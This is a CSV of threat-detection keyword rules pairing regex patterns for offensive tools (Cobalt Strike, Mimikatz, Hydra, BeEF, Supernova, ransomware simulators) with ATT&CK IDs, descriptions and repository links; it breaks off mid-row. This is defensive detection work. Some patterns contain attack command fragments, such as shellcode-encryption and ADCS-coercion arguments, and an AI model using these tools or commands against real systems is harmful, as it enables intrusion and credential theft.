"*./sshimpanzee*",".{0,1000}\.\/sshimpanzee.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lexfo/sshimpanzee","1","0","N/A","10","10","228","26","2024-01-29T14:20:03Z","2023-04-03T10:11:27Z" "*./sudomy*",".{0,1000}\.\/sudomy.{0,1000}","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1853","366","2024-02-19T14:38:48Z","2019-07-26T10:26:34Z" "*./t14m4t *",".{0,1000}\.\/t14m4t\s.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","0","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*./teamserver *",".{0,1000}\.\/teamserver\s.{0,1000}","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. 
recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t0v3rr1d3/armitage","1","0","N/A","N/A","2","110","24","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z" "*./teamserver *",".{0,1000}\.\/teamserver\s.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*./update-beef*",".{0,1000}\.\/update\-beef.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*./Vegile*",".{0,1000}\.\/Vegile.{0,1000}","offensive_tool_keyword","BruteSploit","Ghost In The Shell - This tool will set up your backdoor/rootkits. When the backdoor is already set up it will hide your specific process. unlimited your session in metasploit and transparent. Even when it is killed. it will re-run again. There will always be a process which will run another process. So we can assume that this process is unstoppable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Vegile","1","1","N/A","N/A","7","695","162","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z" "*./xhydra*",".{0,1000}\.\/xhydra.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*./xrkRce *",".{0,1000}\.\/xrkRce\s.{0,1000}","offensive_tool_keyword","POC","SunloginClient RCE vulnerable version","T1587","TA0001 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/sunlogin_rce","1","0","N/A","N/A","5","474","199","2022-02-16T16:11:42Z","2022-02-16T14:20:41Z" "*./zabbix.py*",".{0,1000}\.\/zabbix\.py.{0,1000}","offensive_tool_keyword","POC","POC exploitation of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation 
tools","https://github.com/pykiller/CVE-2022-23131","1","1","N/A","N/A","1","0","0","2022-02-24T11:59:48Z","2022-02-24T11:34:27Z" "*./zexp check -*",".{0,1000}\.\/zexp\scheck\s\-.{0,1000}","offensive_tool_keyword","POC","POC exploitation of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/jweny/zabbix-saml-bypass-exp","1","0","N/A","N/A","1","95","42","2022-02-21T04:27:48Z","2022-02-18T08:38:53Z" "*.\\pipe\\mimikatz*",".{0,1000}\.\\\\pipe\\\\mimikatz.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*.\dumpy.py*",".{0,1000}\.\\dumpy\.py.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","10","1","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z" "*.\stager.ps1*",".{0,1000}\.\\stager\.ps1.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*-._ Parasite Invoke_.-'*",".{0,1000}\-\._\s\s\s\s\s\s\s\s\s\sParasite\sInvoke_\.\-\'.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" "*.500.jasmin*",".{0,1000}\.500\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*.admin.123456.*",".{0,1000}\.admin\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 
- T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.adminusers.txt*",".{0,1000}\.adminusers\.txt.{0,1000}","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","215","29","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" "*.api.123456.*",".{0,1000}\.api\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - 
APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.apps.123456.*",".{0,1000}\.apps\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.arsenal.json*",".{0,1000}\.arsenal\.json.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands 
cheat sheets","8","10","N/A","N/A","N/A","N/A" "*.asp --adcs --template Machine -smb2support*",".{0,1000}\.asp\s\-\-adcs\s\-\-template\sMachine\s\-smb2support.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","0","N/A","10","2","176","23","2024-02-28T22:37:14Z","2024-02-26T12:08:34Z" "*.asreproast.txt*",".{0,1000}\.asreproast\.txt.{0,1000}","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","215","29","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" "*.athena_utils *",".{0,1000}\.athena_utils\s.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*.AzureAD.Application_Owners.csv*",".{0,1000}\.AzureAD\.Application_Owners\.csv.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","7","7","657","98","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" "*.AzureAD.DeviceList_Owners.csv*",".{0,1000}\.AzureAD\.DeviceList_Owners\.csv.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - 
TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","7","7","657","98","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" "*.bashrc persistence setup successfully*",".{0,1000}\.bashrc\spersistence\ssetup\ssuccessfully.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*.beta.123456.*",".{0,1000}\.beta\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.bin -enc rc4 -lang c -k 3 -o *.bin*",".{0,1000}\.bin\s\-enc\src4\s\-lang\sc\s\-k\s3\s\-o\s.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","6","573","100","2024-04-30T14:35:29Z","2023-08-08T11:30:34Z" "*.bin -enc rc4 -lang csharp -k 9*",".{0,1000}\.bin\s\-enc\src4\s\-lang\scsharp\s\-k\s9.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","6","573","100","2024-04-30T14:35:29Z","2023-08-08T11:30:34Z" "*.bin -enc rot -lang csharp -k 2 -d*",".{0,1000}\.bin\s\-enc\srot\s\-lang\scsharp\s\-k\s2\s\-d.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","6","573","100","2024-04-30T14:35:29Z","2023-08-08T11:30:34Z" "*.bin -enc rot -lang rust -k 7*",".{0,1000}\.bin\s\-enc\srot\s\-lang\srust\s\-k\s7.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","6","573","100","2024-04-30T14:35:29Z","2023-08-08T11:30:34Z" "*.bin -enc xor -lang csharp -k 2 -v nickvourd*",".{0,1000}\.bin\s\-enc\sxor\s\-lang\scsharp\s\-k\s2\s\-v\snickvourd.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation 
tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","6","573","100","2024-04-30T14:35:29Z","2023-08-08T11:30:34Z" "*.bin -enc xor -lang nim -k 4*",".{0,1000}\.bin\s\-enc\sxor\s\-lang\snim\s\-k\s4.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","6","573","100","2024-04-30T14:35:29Z","2023-08-08T11:30:34Z" "*.blog.123456.*",".{0,1000}\.blog\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.BruteRatel*",".{0,1000}\.BruteRatel.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and 
Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.cobaltstrike*",".{0,1000}\.cobaltstrike.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.cobaltstrike.beacon_keys*",".{0,1000}\.cobaltstrike\.beacon_keys.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*.cobaltstrike.beacon_keys*",".{0,1000}\.cobaltstrike\.beacon_keys.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - 
Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*.cobaltstrike.beacon_keys*",".{0,1000}\.cobaltstrike\.beacon_keys.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*.com/dcsync/*",".{0,1000}\.com\/dcsync\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*.com/SecureAuthCorp*",".{0,1000}\.com\/SecureAuthCorp.{0,1000}","offensive_tool_keyword","Github Username","github repo hosting exploitation tools for 
pentesters","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/SecureAuthCorp","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.com/SpiderLabs*",".{0,1000}\.com\/SpiderLabs.{0,1000}","offensive_tool_keyword","Github Username","github repo hosting exploitation tools and documentation for pentesters","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/SpiderLabs","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.Credentials.Mimikatz.*",".{0,1000}\.Credentials\.Mimikatz\..{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*.Credentials.Tokens.BypassUAC*",".{0,1000}\.Credentials\.Tokens\.BypassUAC.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - 